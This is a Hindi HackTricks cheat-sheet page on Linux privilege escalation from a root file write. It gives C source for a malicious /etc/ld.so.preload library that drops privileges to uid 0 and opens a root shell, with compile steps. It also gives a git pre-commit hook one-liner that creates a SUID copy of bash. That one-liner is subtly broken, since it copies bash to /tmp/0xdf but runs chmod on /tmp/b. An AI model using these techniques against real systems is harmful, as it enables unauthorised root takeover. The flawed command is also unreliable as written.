6.8 KiB
रूट में अनियमित फ़ाइल लिखें
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? सदस्यता योजनाएं की जांच करें!
- The PEASS Family की खोज करें, हमारा विशेष NFT संग्रह
- आधिकारिक PEASS & HackTricks swag प्राप्त करें
- 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या मुझे Twitter 🐦@carlospolopm** का पालन करें**.
- अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके अपना योगदान दें।
/etc/ld.so.preload
यह फ़ाइल LD_PRELOAD env चर की तरह व्यवहार करती है, लेकिन यह SUID बाइनरी में भी काम करती है।
यदि आप इसे बना सकते हैं या संशोधित कर सकते हैं, तो आप बस प्रत्येक निष्पादित बाइनरी के साथ लोड होने वाली एक पुस्तकालय के पथ को जोड़ सकते हैं।
उदाहरण के लिए: echo "/tmp/pe.so" > /etc/ld.so.preload
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles
गिट हुक्स
गिट हुक्स वे स्क्रिप्ट होते हैं जो गिट रिपॉजिटरी में विभिन्न घटनाओं पर चलाए जाते हैं - जैसे कि जब एक कमिट बनाया जाता है, एक मर्ज होता है... इसलिए यदि एक विशेषाधिकृत स्क्रिप्ट या उपयोगकर्ता इन कार्रवाइयों को अक्सर कर रहा है और यह संभव है कि .git फ़ोल्डर में लिखा जा सके, तो इसका उपयोग अधिकार उन्नयन के लिए किया जा सकता है।
उदाहरण के लिए, यह संभव है कि एक गिट रिपॉ में एक स्क्रिप्ट उत्पन्न किया जाए जो हमेशा नए कमिट बनाए जाने पर .git/hooks में निष्पादित होता है:
{% code overflow="wrap" %}
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit
{% endcode %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? SUBSCRIPTION PLANS की जांच करें!
- The PEASS Family की खोज करें, हमारा एकल NFTs संग्रह!
- आधिकारिक PEASS & HackTricks swag प्राप्त करें
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह में या मुझे Twitter पर फ़ॉलो करें 🐦@carlospolopm.
- अपने हैकिंग ट्रिक्स को hacktricks repo और hacktricks-cloud repo में PR जमा करके साझा करें।